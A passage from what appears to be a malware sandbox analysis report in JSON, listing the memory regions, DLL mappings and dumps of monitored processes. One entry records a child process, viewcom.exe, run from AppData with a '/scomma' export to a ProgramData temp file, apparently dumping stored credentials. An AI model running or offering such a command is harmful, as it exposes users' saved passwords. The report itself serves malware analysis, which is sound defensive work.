"readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1974534144, "type": "region", "version": 1 }, "end_va": 1974575103, "entry_point": 1974539116, "filename": "\\Windows\\System32\\lpk.dll", "id": "region_1348", "name": "lpk.dll", "norm_filename": "c:\\windows\\system32\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1974534144, "timestamp": "00:01:18.552", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 659456, "start_va": 1974861824, "type": "region", "version": 1 }, "end_va": 1975521279, "entry_point": 1975067699, "filename": "\\Windows\\System32\\rpcrt4.dll", "id": "region_1349", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\system32\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1974861824, "timestamp": "00:01:18.552", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 823296, "start_va": 1975582720, "type": "region", "version": 1 }, "end_va": 1976406015, "entry_point": 1975703313, "filename": "\\Windows\\System32\\user32.dll", "id": "region_1350", "name": "user32.dll", "norm_filename": "c:\\windows\\system32\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1975582720, "timestamp": "00:01:18.553", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1979908096, "type": "region", "version": 1 }, "end_va": 1980563455, "entry_point": 1979992549, "filename": "\\Windows\\System32\\advapi32.dll", "id": "region_1351", "name": "advapi32.dll", "norm_filename": "c:\\windows\\system32\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1979908096, "timestamp": "00:01:18.554", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 1980628992, "type": "region", "version": 1 }, "end_va": 1980985343, "entry_point": 1980734374, "filename": "\\Windows\\System32\\shlwapi.dll", "id": "region_1352", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\system32\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 1980628992, "timestamp": "00:01:18.554", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1983053824, "type": "region", "version": 1 }, "end_va": 1983156223, "entry_point": 1983072629, "filename": "\\Windows\\System32\\sechost.dll", "id": "region_1353", "name": "sechost.dll", "norm_filename": "c:\\windows\\system32\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1983053824, "timestamp": "00:01:18.555", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12886016, "start_va": 1984888832, "type": "region", "version": 1 }, "end_va": 1997774847, "entry_point": 1985418753, "filename": "\\Windows\\System32\\shell32.dll", "id": "region_1354", "name": "shell32.dll", "norm_filename": "c:\\windows\\system32\\shell32.dll", "region_type": "memory_mapped_file", "start_va": 1984888832, "timestamp": "00:01:18.560", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 126976, "start_va": 1997799424, "type": "region", "version": 1 }, "end_va": 1997926399, "entry_point": 1997804373, "filename": "\\Windows\\System32\\imm32.dll", "id": "region_1355", "name": "imm32.dll", "norm_filename": "c:\\windows\\system32\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 1997799424, "timestamp": "00:01:18.560", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 503808, "start_va": 1997930496, "type": "region", "version": 1 }, "end_va": 1998434303, "entry_point": 1997930496, "filename": "\\Windows\\System32\\comdlg32.dll", "id": "region_1356", "name": "comdlg32.dll", "norm_filename": "c:\\windows\\system32\\comdlg32.dll", "region_type": "memory_mapped_file", "start_va": 1997930496, "timestamp": "00:01:18.562", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1999503360, "type": "region", "version": 1 }, "end_va": 2000338943, "entry_point": 1999509131, "filename": "\\Windows\\System32\\msctf.dll", "id": "region_1357", "name": "msctf.dll", "norm_filename": "c:\\windows\\system32\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1999503360, "timestamp": "00:01:18.591", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 2000355328, "type": "region", "version": 1 }, "end_va": 2001059839, "entry_point": 2000397426, "filename": "\\Windows\\System32\\msvcrt.dll", "id": "region_1358", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\system32\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 2000355328, "timestamp": "00:01:18.593", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1425408, "start_va": 2001076224, "type": "region", "version": 1 }, "end_va": 2002501631, "entry_point": 2001386045, "filename": "\\Windows\\System32\\ole32.dll", "id": "region_1359", "name": "ole32.dll", "norm_filename": "c:\\windows\\system32\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 2001076224, "timestamp": "00:01:18.594", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 319488, "start_va": 2003894272, "type": "region", "version": 1 }, "end_va": 2004213759, "entry_point": 2003934217, "filename": "\\Windows\\System32\\gdi32.dll", "id": "region_1360", "name": "gdi32.dll", "norm_filename": "c:\\windows\\system32\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 2003894272, "timestamp": "00:01:18.595", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2137980928, "type": "region", "version": 1 }, "end_va": 2139029503, "entry_point": 0, "filename": null, "id": "region_1361", "name": "pagefile_0x000000007f6f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2137980928, "timestamp": "00:01:18.596", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001397-addr_0x0000000000020000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_260", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_1397", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:01:19.007", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001398-addr_0x00000000001b0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_261", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 1769472, "type": "region", "version": 1 }, "end_va": 1773567, "entry_point": 0, "filename": null, "id": "region_1398", "name": "private_0x00000000001b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1769472, "timestamp": "00:01:19.007", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001399-addr_0x00000000003f0000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_262", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 4128768, "type": "region", "version": 1 }, "end_va": 4194303, "entry_point": 0, "filename": null, "id": "region_1399", "name": "private_0x00000000003f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 4128768, "timestamp": "00:01:19.008", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1052672, "start_va": 5177344, "type": "region", "version": 1 }, "end_va": 6230015, "entry_point": 0, "filename": null, "id": "region_1400", "name": "pagefile_0x00000000004f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5177344, "timestamp": "00:01:19.008", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12582912, "start_va": 6291456, "type": "region", "version": 1 }, "end_va": 18874367, "entry_point": 0, "filename": null, "id": "region_1401", "name": "pagefile_0x0000000000600000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 6291456, "timestamp": "00:01:19.008", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 1835008, "type": "region", "version": 1 }, "end_va": 1839103, "entry_point": 0, "filename": null, "id": "region_1412", "name": "pagefile_0x00000000001c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1835008, "timestamp": "00:01:19.148", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001413-addr_0x0000000001200000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_269", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 18874368, "type": "region", "version": 1 }, "end_va": 19922943, "entry_point": 0, "filename": null, "id": "region_1413", "name": "private_0x0000000001200000", "norm_filename": null, "region_type": "private_memory", "start_va": 18874368, "timestamp": "00:01:19.149", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 19922944, "type": "region", "version": 1 }, "end_va": 22867967, "entry_point": 19922944, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_1414", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 19922944, "timestamp": "00:01:19.151", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 53248, "start_va": 1921056768, "type": "region", "version": 1 }, "end_va": 1921110015, "entry_point": 1921056768, "filename": "\\Windows\\System32\\pstorec.dll", "id": "region_1443", "name": "pstorec.dll", "norm_filename": "c:\\windows\\system32\\pstorec.dll", "region_type": "memory_mapped_file", "start_va": 1921056768, "timestamp": "00:01:19.467", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 81920, "start_va": 1948123136, "type": "region", "version": 1 }, "end_va": 1948205055, "entry_point": 1948130729, "filename": "\\Windows\\System32\\atl.dll", "id": "region_1450", "name": "atl.dll", "norm_filename": "c:\\windows\\system32\\atl.dll", "region_type": "memory_mapped_file", "start_va": 1948123136, "timestamp": "00:01:19.576", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001649-addr_0x00000000015d0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_301", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 22872064, "type": "region", "version": 1 }, "end_va": 23920639, "entry_point": 0, "filename": null, "id": "region_1649", "name": "private_0x00000000015d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 22872064, "timestamp": "00:01:25.079", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001650-addr_0x000000007ffde000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_302", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147344384, "type": "region", "version": 1 }, "end_va": 2147348479, "entry_point": 0, "filename": null, "id": "region_1650", "name": "private_0x000000007ffde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147344384, "timestamp": "00:01:25.083", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1167360, "start_va": 1970995200, "type": "region", "version": 1 }, "end_va": 1972162559, "entry_point": 1971000714, "filename": "\\Windows\\System32\\crypt32.dll", "id": "region_1651", "name": "crypt32.dll", "norm_filename": "c:\\windows\\system32\\crypt32.dll", "region_type": "memory_mapped_file", "start_va": 1970995200, "timestamp": "00:01:25.085", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1970798592, "type": "region", "version": 1 }, "end_va": 1970847743, "entry_point": 1970807694, "filename": "\\Windows\\System32\\msasn1.dll", "id": "region_1652", "name": "msasn1.dll", "norm_filename": "c:\\windows\\system32\\msasn1.dll", "region_type": "memory_mapped_file", "start_va": 1970798592, "timestamp": "00:01:25.087", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 110592, "start_va": 1969487872, "type": "region", "version": 1 }, "end_va": 1969598463, "entry_point": 1969525689, "filename": "\\Windows\\System32\\sspicli.dll", "id": "region_1653", "name": "sspicli.dll", "norm_filename": "c:\\windows\\system32\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 1969487872, "timestamp": "00:01:25.091", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "\"C:\\Users\\ATVeyDl98Z\\AppData\\Local\\Microsoft\\Windows\\viewcom.exe\" /scomma \"C:\\ProgramData\\9F1C.tmp\"", "filename": "c:\\users\\atveydl98z\\appdata\\local\\microsoft\\windows\\viewcom.exe", "id": "proc_9", "image_name": "viewcom.exe", "monitor_reason": "child_process", "monitored_id": 9, "origin_monitor_id": 6, "ref_parent_process": { "ref_id": "proc_6", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "process_00000009-region_00001330-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_248", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_1330", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:01:18.397", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001331-addr_0x0000000000030000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_249", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 1245183, "entry_point": 0, "filename": null, "id": "region_1331", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:01:18.399", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 1245184, "type": "region", "version": 1 }, "end_va": 1261567, "entry_point": 0, "filename": null, "id": "region_1332", "name": "pagefile_0x0000000000130000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1245184, "timestamp": "00:01:18.399", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001333-addr_0x0000000000400000-size_0x000000000005b000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_250", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 372736, "start_va": 4194304, "type": "region", "version": 1 }, "end_va": 4567039, "entry_point": 0, "filename": null, "id": "region_1333", "name": "private_0x0000000000400000", "norm_filename": null, "region_type": "private_memory", "start_va": 4194304, "timestamp": "00:01:18.400", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1294336, "start_va": 2002518016, "type": "region", "version": 1 }, "end_va": 2003812351, "entry_point": 2002518016, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_1334", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2002518016, "timestamp": "00:01:18.400", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 2004877312, "type": "region", "version": 1 }, "end_va": 2004881407, "entry_point": 2004877312, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_1335", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 2004877312, "timestamp": "00:01:18.403", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2147155968, "type": "region", "version": 1 }, "end_va": 2147299327, "entry_point": 0, "filename": null, "id": "region_1336", "name": "pagefile_0x000000007ffb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2147155968, "timestamp": "00:01:18.407", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001337-addr_0x000000007ffd8000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_251", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147319808, "type": "region", "version": 1 }, "end_va": 2147323903, "entry_point": 0, "filename": null, "id": "region_1337", "name": "private_0x000000007ffd8000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147319808, "timestamp": "00:01:18.408", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001338-addr_0x000000007ffdf000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_252", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147348480, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_1338", "name": "private_0x000000007ffdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147348480, "timestamp": "00:01:18.408", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001362-addr_0x0000000000190000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_255", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 1638400, "type": "region", "version": 1 }, "end_va": 2686975, "entry_point": 0, "filename": null, "id": "region_1362", "name": "private_0x0000000000190000", "norm_filename": null, "region_type": "private_memory", "start_va": 1638400, "timestamp": "00:01:18.623", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 303104, "start_va": 1972174848, "type": "region", "version": 1 }, "end_va": 1972477951, "entry_point": 1972207072, "filename": "\\Windows\\System32\\KernelBase.dll", "id": "region_1363", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\system32\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1972174848, "timestamp": "00:01:18.623", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 868352, "start_va": 1983184896, "type": "region", "version": 1 }, "end_va": 1984053247, "entry_point": 1983495652, "filename": "\\Windows\\System32\\kernel32.dll", "id": "region_1364", "name": "kernel32.dll", "norm_filename": "c:\\windows\\system32\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1983184896, "timestamp": "00:01:18.624", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_1365", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:01:18.692", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 2686976, "type": "region", "version": 1 }, "end_va": 3108863, "entry_point": 2686976, "filename": "\\Windows\\System32\\locale.nls", "id": "region_1366", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 2686976, "timestamp": "00:01:18.692", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001367-addr_0x0000000000390000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_256", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 3735552, "type": "region", "version": 1 }, "end_va": 3801087, "entry_point": 0, "filename": null, "id": "region_1367", "name": "private_0x0000000000390000", "norm_filename": null, "region_type": "private_memory", "start_va": 3735552, "timestamp": "00:01:18.734", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 819200, "start_va": 4587520, "type": "region", "version": 1 }, "end_va": 5406719, "entry_point": 0, "filename": null, "id": "region_1368", "name": "pagefile_0x0000000000460000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4587520, "timestamp": "00:01:18.734", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 540672, "start_va": 1916534784, "type": "region", "version": 1 }, "end_va": 1917075455, "entry_point": 1916541353, "filename": "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll", "id": "region_1369", "name": "comctl32.dll", "norm_filename": "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll", "region_type": "memory_mapped_file", "start_va": 1916534784, "timestamp": "00:01:18.734", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 1959133184, "type": "region", "version": 1 }, "end_va": 1959170047, "entry_point": 1959137824, "filename": "\\Windows\\System32\\version.dll", "id": "region_1370", "name": "version.dll", "norm_filename": "c:\\windows\\system32\\version.dll", "region_type": "memory_mapped_file", "start_va": 1959133184, "timestamp": "00:01:18.736", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1970798592, "type": "region", "version": 1 }, "end_va": 1970847743, "entry_point": 1970807694, "filename": "\\Windows\\System32\\msasn1.dll", "id": "region_1371", "name": "msasn1.dll", "norm_filename": "c:\\windows\\system32\\msasn1.dll", "region_type": "memory_mapped_file", "start_va": 1970798592, "timestamp": "00:01:18.736", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1167360, "start_va": 1970995200, "type": "region", "version": 1 }, "end_va": 1972162559, "entry_point": 1971000714, "filename": "\\Windows\\System32\\crypt32.dll", "id": "region_1372", "name": "crypt32.dll", "norm_filename": "c:\\windows\\system32\\crypt32.dll", "region_type": "memory_mapped_file", "start_va": 1970995200, "timestamp": "00:01:18.740", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1973878784, "type": "region", "version": 1 }, "end_va": 1974521855, "entry_point": 1974091735, "filename": "\\Windows\\System32\\usp10.dll", "id": "region_1373", "name": "usp10.dll", "norm_filename": "c:\\windows\\system32\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1973878784, "timestamp": "00:01:18.741", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1974534144, "type": "region", "version": 1 }, "end_va": 1974575103, "entry_point": 1974539116, "filename": "\\Windows\\System32\\lpk.dll", "id": "region_1374", "name": "lpk.dll", "norm_filename": "c:\\windows\\system32\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1974534144, "timestamp": "00:01:18.742", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 659456, "start_va": 1974861824, "type": "region", "version": 1 }, "end_va": 1975521279, "entry_point": 1975067699, "filename": "\\Windows\\System32\\rpcrt4.dll", "id": "region_1375", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\system32\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1974861824, "timestamp": "00:01:18.743", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 823296, "start_va": 1975582720, "type": "region", "version": 1 }, "end_va": 1976406015, "entry_point": 1975703313, "filename": "\\Windows\\System32\\user32.dll", "id": "region_1376", "name": "user32.dll", "norm_filename": "c:\\windows\\system32\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1975582720, "timestamp": "00:01:18.744", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1269760, "start_va": 1976434688, "type": "region", "version": 1 }, "end_va": 1977704447, "entry_point": 1976441653, "filename": "\\Windows\\System32\\urlmon.dll", "id": "region_1377", "name": "urlmon.dll", "norm_filename": "c:\\windows\\system32\\urlmon.dll", "region_type": "memory_mapped_file", "start_va": 1976434688, "timestamp": "00:01:18.745", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2076672, "start_va": 1977810944, "type": "region", "version": 1 }, "end_va": 1979887615, "entry_point": 1977819865, "filename": "\\Windows\\System32\\iertutil.dll", "id": "region_1378", "name": "iertutil.dll", "norm_filename": "c:\\windows\\system32\\iertutil.dll", "region_type": "memory_mapped_file", "start_va": 1977810944, "timestamp": "00:01:18.746", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 